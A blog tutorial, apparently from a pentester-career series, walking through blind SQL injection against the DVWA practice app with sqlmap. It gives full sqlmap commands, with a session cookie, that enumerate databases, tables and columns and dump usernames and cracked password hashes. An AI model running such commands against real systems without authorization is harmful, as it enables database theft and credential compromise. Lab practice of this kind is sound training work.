Tips for an Information Security Analyst/Pentester career - Episode 12 (reviewed version): Blind SQL injection with DVWA
Last reviewed: 8/27/2017
Intro
We talked about SQL injection over the previous episode.
I manually inputted injection commands within input fields to crack the database.
However, this isn't the only, nor the best approach.
If we can't manually input the commands (input sanitation), or we want a faster approach, we can try a blind SQL injection attack.
In this case, we'll have a software run the SQL injection for us, instead of having to do it manually.
Prep
I enter a valid user id (3) in DVWA and click Submit.
We need the URL of the page we're in (shown below).
At that point, I grab the cookie session ID by right-clicking on an empty point in the page and clicking Page Info and then Security.
Sqlmap execution
We launch the following command in Sqlmap:
sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" --dump-all
After retrieving all the information, sqlmap starts cracking the retrieved password hashes.
Then it dumps all this information to a file.
We can have a confirmation we're using a blind method by adding -v to the command, as shown below.
Afterward, we want to know the name of the database and we use following command:
sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" --dbs
The command returns 7 available databases, as shown below.
Now that we know the name of the database (dvwa), we can analyze its tables: sqlmap -u
"localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit"
--cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" -D dvwa
--tables
The command returns two tables. Apparently, user is the one we want to know more about.
Now, we want to have a look at the columns in the user table, and we run the following command:
sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" -T users --column
sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" -T users --column
The command returns two interesting columns (user and password).
At this point, we want to extract information from these two columns and we run a new command for this purpose:
sqlmap -u "localhost/dvwa/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="PHPSESSID=cd6943cmvuvu8v2c4hl77cqvp7; security=low;" -C user,password --dump
Results
Usernames and passwords are stored under /root/.sqlmap/output/localhost/dump/dvwa/users.csv
By opening it with Excel (under OS X), we can view all usernames and passwords for that specific database.
Wrap-up
Blind SQL injection can be an alternative and more insidious approach than the traditional SQL injection.
However, blind injection might also be slower than a manual method.
It's a kinda set-and-forget approach but that's the only alternative in case of input validation, where we can't use normal SQL injection attacks.
Comments
Post a Comment